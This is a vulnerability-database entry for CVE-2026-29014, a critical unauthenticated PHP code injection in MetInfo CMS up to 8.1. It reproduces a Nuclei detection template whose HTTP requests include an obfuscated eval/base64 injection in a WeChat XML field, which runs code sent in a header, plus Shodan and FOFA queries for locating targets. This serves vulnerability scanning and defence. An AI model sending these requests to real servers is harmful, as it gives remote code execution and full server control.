MetInfo CMS <= 8.1 - Remote Code Execution

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType

MetInfo CMS versions 7.9–8.1 allow unauthenticated PHP code execution; update beyond 8.1.

Reporter	Title	Published	Views	Family All 15
Circl	CVE-2026-29014	1 Apr 202615:26	–	circl
CNNVD	MetInfo CMS 安全漏洞	1 Apr 202600:00	–	cnnvd
CVE	CVE-2026-29014	1 Apr 202612:22	–	cve
Cvelist	CVE-2026-29014 MetInfo CMS Unauthenticated PHP Code Injection RCE	1 Apr 202612:22	–	cvelist
EUVD	EUVD-2026-17875	1 Apr 202615:31	–	euvd
NVD	CVE-2026-29014	1 Apr 202613:16	–	nvd
Packet Storm	📄 MetInfo CMS 8.1 Code Injection	1 Apr 202600:00	–	packetstorm
Packet Storm	📄 MetInfo CMS 8.1 Shell Upload Mass Exploiter	24 Apr 202600:00	–	packetstorm
Packet Storm	📄 MetInfo CMS 8.1 PHP Code Injection	24 Apr 202600:00	–	packetstorm
Packet Storm News	MetInfo CMS 8.1 WeChat Module Vulnerability Detection Scanner	24 Apr 202600:00	–	packetstormnews

Source	Link
karmainsecurity	www.karmainsecurity.com/KIS-2026-06
metinfo	www.metinfo.cn/
nvd	www.nvd.nist.gov/vuln/detail/CVE-2026-29014

id: CVE-2026-29014

info:
  name: MetInfo CMS <= 8.1 - Remote Code Execution
  author: 0x_Akoko
  severity: critical
  description: |
   MetInfo CMS 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability caused by insufficient input neutralization in the execution path, letting remote attackers execute arbitrary code remotely, exploit requires crafted requests.
  impact: |
   Remote attackers can execute arbitrary code, gaining full control over the affected server.
  remediation: |
   Update to the latest version beyond 8.1.
  reference:
    - https://karmainsecurity.com/KIS-2026-06
    - https://www.metinfo.cn
    - https://nvd.nist.gov/vuln/detail/CVE-2026-29014
  classification:
    cve-id: CVE-2026-29014
    epss-score: 0.31224
    epss-percentile: 0.96854
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-94
  metadata:
    max-request: 3
    verified: true
    shodan-query: http.title:"MetInfo"
    fofa-query: app="MetInfo"
  tags: cve,cve2026,metinfo,rce,php,vkev

variables:
  num1: "{{rand_int(800000, 999999)}}"
  num2: "{{rand_int(800000, 999999)}}"
  result: "{{to_number(num1)*to_number(num2)}}"


flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "MetInfo", "mituo")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /app/system/entrance.php?n=include&m=module&c=weixin&a=doapi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&#x26;../config/tables</EventKey><FromUserName>{${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)]))}}.{${die()}}</FromUserName></x>

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "success")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /app/system/entrance.php?n=include&m=module&c=weixin&a=doapi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml
        C: {{base64("echo {{num1}}*{{num2}};die();")}}

        <x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&#x26;Array</EventKey></x>

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "text/html")'
          - 'contains(body, "{{result}}")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022044a7c38356cefb82765725642b494f0dd6baa0c4b8e52e26c62e307bb896d142022100bc464511f642e19aea4353ba90df9622e17eb504f1426ffb93deed9cfb9c35f6:922c64590222798bb761d5b6d8e72950

06 Apr 2026 03:05Current

6.5Medium risk

Vulners AI Score6.5

CVSS 49.3

CVSS 3.19.8

EPSS0.31224

SSVC